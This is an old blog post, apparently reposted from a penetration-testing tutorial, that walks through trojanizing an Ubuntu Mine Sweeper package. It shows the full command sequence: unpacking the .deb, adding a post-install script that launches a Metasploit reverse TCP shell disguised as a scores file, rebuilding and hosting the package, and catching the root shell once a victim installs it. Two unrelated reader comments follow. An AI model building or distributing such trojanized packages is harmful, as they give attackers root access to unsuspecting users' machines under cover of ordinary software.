Saturday, October 23, 2010

Linux Binary Trojans A Way to Infect Linux Machines

In order to demonstrate that client side attacks and trojans are not exclusive to the Windows world, we will package a Metasploit payload in with an Ubuntu deb package to give us a shell on Linux.
An excellent video was made by Redmeat_uk demonstrating this technique

We first need to download the package that we are going to infect and move it to a temporary working directory. In our example, we will use the package ‘freesweep’, a text-based version of Mine Sweeper.
root@bt4:/pentest/exploits/framework3# apt-get --download-only install freesweep
Reading package lists... Done
Building dependency tree
Reading state information... Done
root@bt4:/pentest/exploits/framework3# mkdir /tmp/evil
root@bt4:/pentest/exploits/framework3# mv /var/cache/apt/archives/freesweep_0.90-1_i386.deb /tmp/evil
root@bt4:/pentest/exploits/framework3# cd /tmp/evil/
Next, we need to extract the package to a working directory and create a DEBIAN directory to hold our additional added “features”.
root@v-bt4-pre:/tmp/evil# dpkg -x freesweep_0.90-1_i386.deb work
root@v-bt4-pre:/tmp/evil# mkdir work/DEBIAN
In the ‘DEBIAN’ directory, create a file named ‘control’ that contains the following:
root@bt4:/tmp/evil/work/DEBIAN# cat control
Package: freesweep
Version: 0.90-1
Section: Games and Amusement
Priority: optional
Architecture: i386
Maintainer: Ubuntu MOTU Developers (
Description: a text-based minesweeper
Freesweep is an implementation of the popular minesweeper game, where
one tries to find all the mines without igniting any, based on hints given
by the computer. Unlike most implementations of this game, Freesweep
works in any visual text display - in Linux console, in an xterm, and in
most text-based terminals currently in use.
We also need to create a post-installation script that will execute our binary. In our ‘DEBIAN’, we’ll create a file named ‘postinst’ that contains the following:
root@bt4:/tmp/evil/work/DEBIAN# cat postinst
sudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &
Now we’ll create our malicious payload. We’ll be creating a reverse shell to connect back to us named ‘freesweep_scores’.
root@bt4:/pentest/exploits/framework3# ./msfpayload linux/x86/shell/reverse_tcp LHOST= LPORT=443 X > /tmp/evil/work/usr/games/freesweep_scores
Created by msfpayload (
Payload: linux/x86/shell/reverse_tcp
Length: 50
Options: LHOST=,LPORT=443
We’ll now make our post-installation script executable and build our new package. The built file will be named ‘work.deb’ so we will want to change that to ‘freesweep.deb’ and copy the package to our web root directory.
root@bt4:/tmp/evil/work/DEBIAN# chmod 755 postinst
root@bt4:/tmp/evil/work/DEBIAN# dpkg-deb --build /tmp/evil/work
dpkg-deb: building package `freesweep' in `/tmp/evil/work.deb'.
root@bt4:/tmp/evil# mv work.deb freesweep.deb
root@bt4:/tmp/evil# cp freesweep.deb /var/www/
If it is not already running, we’ll need to start the Apache web server.
root@bt4:/tmp/evil# /etc/init.d/apache2 start
We will need to set up the Metasploit multi/handler to receive the incoming connection.
root@bt4:/pentest/exploits/framework3# ./msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST= LPORT=443 E
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST
[*] Started reverse handler
[*] Starting the payload handler...
On our Ubuntu victim, we have somehow convinced the user to download and install our awesome new game.
ubuntu@ubuntu:~$ wget
ubuntu@ubuntu:~$ sudo dpkg -i freesweep.deb
As the victim installs and plays our game, we have received a shell!
[*] Sending stage (36 bytes)
[*] Command shell session 1 opened ( ->
eth1 Link encap:Ethernet HWaddr 00:0C:29:C2:E7:E6
inet addr: Bcast: Mask:
RX packets:49 errors:0 dropped:0 overruns:0 frame:0
TX packets:51 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:43230 (42.2 KiB) TX bytes:4603 (4.4 KiB)
Interrupt:17 Base address:0×1400


uid=0(root) gid=0(root) groups=0(root)

Source : ZeroCold
Filed Under :

2 comments for "Linux Binary Trojans A Way to Infect Linux Machines"

  1. subash get across to me at from finland

  2. hey ola wassup long time :)
    how are u
    well yea would add you in msn